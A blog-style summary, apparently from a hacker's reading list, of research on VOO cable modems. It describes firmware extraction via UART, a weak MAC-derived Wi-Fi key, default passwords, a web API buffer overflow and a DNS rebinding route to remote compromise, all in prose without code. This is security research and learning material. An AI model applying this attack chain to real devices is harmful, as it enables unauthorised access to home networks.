Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

VOO is an internet provider in Belgian. They have created two different table modems: a Netgear and a Technicolor.

In order to understand the device, the hacker decided to reverse engineer the firmware. After connecting to a UART interface, a CM console popped open. Although this was not a root shell, there is a nice tool that can be used in order to dump the firmware by running commands in the CM console. It took a few tries to setup the configuration just right though.

After reverse engineering the recovered firmware, the author discovered that a weak pre-shared key (PSK) generation algorithm is used. By knowing the MAC (which is advertised), an attacker can connect to the network.

Additionally, several interfaces (web, ssh and SMB) all have default passwords that are likely never changed by its users. There is also a buffer overflow in several of the web API commands. Because there is a modem, there are likely no binary protections, making this easy to exploit.

A compromise has now occurred when in close range. But, can this be done remotely? Because the web admin portal is only reachable on the LAN, this did not seem possible. However, the author cooked up some good stuff!

By using a DNS rebinding attack on a malicious site, the localhost domain can be verified to be the correct one (bypass for the Same-Origin Policy). Using the default credentials or the weak PSK issue from before, we can connect to the device to exploit the buffer overflow to pop a shell.

Overall, this article is a little long for the amount of bugs (3ish) in it. But, the usage of the DNS rebinding and the crypto attack were interesting.